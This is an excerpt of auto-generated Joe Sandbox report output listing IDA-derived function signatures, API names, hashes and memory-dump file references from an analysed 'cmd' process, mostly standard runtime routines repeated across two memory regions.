                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: CurrentProcessProtectVirtual$HandleModule
                          • String ID:
                          • API String ID: 1092925422-0
                          • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                          • Instruction ID: e8697e66de8636978fa6b156ef569a72760f9f61d9d5417f0d4b0f49bc2a0a74
                          • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                          • Instruction Fuzzy Hash: FE111C36609746E3EB24CB35E4043AA67B1FB45BC4F540036EBAE03794EB7DC9588B84
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                          • String ID: csm
                          • API String ID: 2395640692-1018135373
                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                          • Instruction ID: 7e2e6ccf2d6b99bdf25f5526e77430cc9d90bf30b910f66c08a1e46288b86557
                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                          • Instruction Fuzzy Hash: A751AC3231960AEAEF54CB25E445BBC77B2E354B98F948131EB6B47788DB79C841C701
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                          • String ID: csm
                          • API String ID: 2395640692-1018135373
                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                          • Instruction ID: caca30618d2c3af37abfa9b2703f2bb75a11daf8dd769027a199042a49286ef6
                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                          • Instruction Fuzzy Hash: 47516B33219602EADB548B29E444BFC77D2FB58BD8F944121DB6B47788DB78C849CB01
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: CallEncodePointerTranslator
                          • String ID: MOC$RCC
                          • API String ID: 3544855599-2084237596
                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                          • Instruction ID: 6ca5a59052bbb629dd9e6bf8f62479fa36dad10ff45875d764e2ec395e30cf09
                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                          • Instruction Fuzzy Hash: 8D61A132508BC9D1EF308F25E4407EABBB1F795B94F844225EBA917B99DB78C190CB01
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                          • String ID: csm$csm
                          • API String ID: 3896166516-3733052814
                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                          • Instruction ID: d54ab1ad7a4aac89675e81e00d7e332d3897c339d6693f567e566c741d8a89bd
                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                          • Instruction Fuzzy Hash: 89519D3610839AEBFF648F3295443B877B6F355B84F944126DBAA47B95CB38C450C742
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: CallEncodePointerTranslator
                          • String ID: MOC$RCC
                          • API String ID: 3544855599-2084237596
                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                          • Instruction ID: 9d2b7b154a80372f384b2a87cf180299b34813c23b8b01e6650307e5dc32377b
                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                          • Instruction Fuzzy Hash: 8E618C33508BC5D5EB259B25E4403EEB7A1FB85BD4F844225EBAA13B95DB78C198CF00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                          • String ID: csm$csm
                          • API String ID: 3896166516-3733052814
                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                          • Instruction ID: e076238797027a85e732e23aedb4f8ca6dbd65138c0d644f5ed1c13424e0e89a
                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                          • Instruction Fuzzy Hash: 2A51AF33208382EBEB689B3195443AC7BE6FB54BD4F944125DBAA43B91DB38C459CF01
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000003.1885424932.000001F119790000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F119790000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_3_1f119790000_cmd.jbxd
                          Similarity
                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                          • String ID: csm$csm
                          • API String ID: 3896166516-3733052814
                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                          • Instruction ID: 9fc2afec4a717a588f7577aa43125f78d6d22e61102e86927c79f0503f3a33c9
                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                          • Instruction Fuzzy Hash: 4D519F32108742EAEF789B3591443A8B7A2EB55BE4F944125DBAA47B85EB38C458CF01
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                          • String ID: pid_
                          • API String ID: 517849248-4147670505
                          • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                          • Instruction ID: 593c2593a998de5c385a7fd854b0f8664597d44e72d7e6bc281c2c985baa3725
                          • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                          • Instruction Fuzzy Hash: 32117F31318786F2FF10AB35E8403FAA2B6B784780FC040359B6A93695EF69C945C740
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                          • String ID: pid_
                          • API String ID: 517849248-4147670505
                          • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                          • Instruction ID: 1791c52605e6dd3ad13faa202fb22ea0365300e854e57fa0aa4c22c74099d00f
                          • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                          • Instruction Fuzzy Hash: AD111F32318792E1FB109B35E8413EE52E6BF847C4FD44435EB6A93699EF69C909CB00
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: FileWrite$ConsoleErrorLastOutput
                          • String ID:
                          • API String ID: 2718003287-0
                          • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                          • Instruction ID: 0187543c796b829238ac692c5e0d014b40441302505adc5c6f2e512a39fbf18d
                          • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                          • Instruction Fuzzy Hash: C5D1D232718A89D9EB11CFB5D5442EC37B2F354B98F844226DF6E97B99DA34C146C380
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: FileWrite$ConsoleErrorLastOutput
                          • String ID:
                          • API String ID: 2718003287-0
                          • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                          • Instruction ID: 30e60218249b0fecb6468395d0a9815f26cec6d2d2211726d3a4cb2db23b2707
                          • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                          • Instruction Fuzzy Hash: A2D1BC32718A95EAE711CBB5D4402EC37B2FB45BD8F844126CF6E97B99DA34C50ACB40
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: Heap$Process$Free
                          • String ID:
                          • API String ID: 3168794593-0
                          • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                          • Instruction ID: 1661870e5b9bade6fbdfa9722be91761fefd77572138c71076725b4710dc5f94
                          • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                          • Instruction Fuzzy Hash: 41016932615B85EAEB14DF76E8041A977A2F789F80B894035DF6A43728DF38D491C780
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: Heap$Process$Free
                          • String ID:
                          • API String ID: 3168794593-0
                          • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                          • Instruction ID: 7d513b44c6e7b97723e2dcae595bd5cfd40390db5bd993160c1543ed17bb9cb2
                          • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                          • Instruction Fuzzy Hash: 1A012D32614B95EADB14DF66E8041A977B2FB88FC0B494035DF5A53714EF34D455CB40
                          APIs
                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001F119D628DF), ref: 000001F119D62A12
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: ConsoleMode
                          • String ID:
                          • API String ID: 4145635619-0
                          • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                          • Instruction ID: bfbf21c97edfa9ac49edf96444abb8ba27582ecc4fecadc38fc6d058470443b2
                          • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                          • Instruction Fuzzy Hash: 3C91E43271865AE9FF648F7594503FD2BA2F395B88F844126DF6BA3A89DB34C445C340
                          APIs
                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001F1197E28DF), ref: 000001F1197E2A12
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: ConsoleMode
                          • String ID:
                          • API String ID: 4145635619-0
                          • Opcode ID: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                          • Instruction ID: 98c7e07e0e7d4f17f01d19fde8529946b816e95c4aa7fdd8142ee534952e0eb6
                          • Opcode Fuzzy Hash: 84db17c61f8644ba0c376578cd7e648754f889cd263a50ace8e4a54d342680a6
                          • Instruction Fuzzy Hash: 3F91F232718662E9FB608F7594503FD2BA2BB44BC8F84512ADF2B67694EA34C449CB00
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                          • String ID:
                          • API String ID: 2933794660-0
                          • Opcode ID: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                          • Instruction ID: 57ee1d7fd5bce0a79f59a3f373a24279549984caa6ba4a6fd04847dbdfd01b11
                          • Opcode Fuzzy Hash: 61e3724c6de8b17bf9a8ee54dd3d1bb067003c5f3b921a84847ee34476b0adea
                          • Instruction Fuzzy Hash: 81111536714F0ADAEF00CB70E8553A833A4F719768F840E31EB6E867A4DB78C1948380
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: FileType
                          • String ID: \\.\pipe\
                          • API String ID: 3081899298-91387939
                          • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                          • Instruction ID: e2bd8ce15a067fea017b737ed8deff2502d325846d3c62649e4e6aaeb0d9b635
                          • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                          • Instruction Fuzzy Hash: D7716036608B87E1FF759E3698543FA66A6B395BC4F840026EF2B57B58DE34C604C740
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2537377329.000001F1197F9000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f1197d0000_cmd.jbxd
                          Similarity
                          • API ID: FileType
                          • String ID: \\.\pipe\
                          • API String ID: 3081899298-91387939
                          • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                          • Instruction ID: 77c259268ef0706f6e5081c934b482686296ee93083ed8c24db98bc15796bdc4
                          • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
                          • Instruction Fuzzy Hash: 09716037208B53A1E6749A3698543FE67D6FB857D4F940036DE2B53B85DA35C609CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000003.1885424932.000001F119790000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F119790000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_3_1f119790000_cmd.jbxd
                          Similarity
                          • API ID: CurrentImageNonwritable__except_validate_context_record
                          • String ID: csm
                          • API String ID: 3242871069-1018135373
                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                          • Instruction ID: 278017b214f3b86cac2af6f4aa487c42388b2c3bec964a5dfcdd17b8fee2d692
                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                          • Instruction Fuzzy Hash: DA51A032319A02EADB54CB35E444BF83392EB44BE8F958135DB6B47788E779C849CB01
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000003.1885424932.000001F119790000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001F119790000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_3_1f119790000_cmd.jbxd
                          Similarity
                          • API ID: CallTranslator
                          • String ID: MOC$RCC
                          • API String ID: 3163161869-2084237596
                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                          • Instruction ID: 57f210cdb46e057946cbcae54786e64c11d60285d3996e22fdc3aa4e1a85be00
                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                          • Instruction Fuzzy Hash: CA619132508BC5D5E7709F25E4407EAB7A1FB857D4F444225EBAA07B95EB78C194CB00
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2546953403.000001F119D51000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F119D50000, based on PE: true
                          • Associated: 00000015.00000002.2546116951.000001F119D50000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2547995359.000001F119D65000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2548880954.000001F119D70000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2549743871.000001F119D72000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2550601758.000001F119D79000.00000002.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_1f119d50000_cmd.jbxd
                          Similarity
                          • API ID: FileType
                          • String ID: \\.\pipe\
                          • API String ID: 3081899298-91387939
                          • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                          • Instruction ID: 0b9c551fef9ba0cf945f1aa0689a579e461a2a92cbea93b2179b9112dd0d9be1
                          • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
                          • Instruction Fuzzy Hash: AD51A13A20C78AE1FE24DE35A4543FA6662F395B90F840035EF6B53BA9DE39C408C740
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.2533636230.000001F1197D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001F1197D0000, based on PE: true
                          • Associated: 00000015.00000002.2532788564.000001F1197D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2534807754.000001F1197E5000.00000002.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2535656225.000001F1197F0000.00000004.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000015.00000002.2536508994.000001F1197F2000.00000002.00001000.00020000.00000000.sdmpDownload File
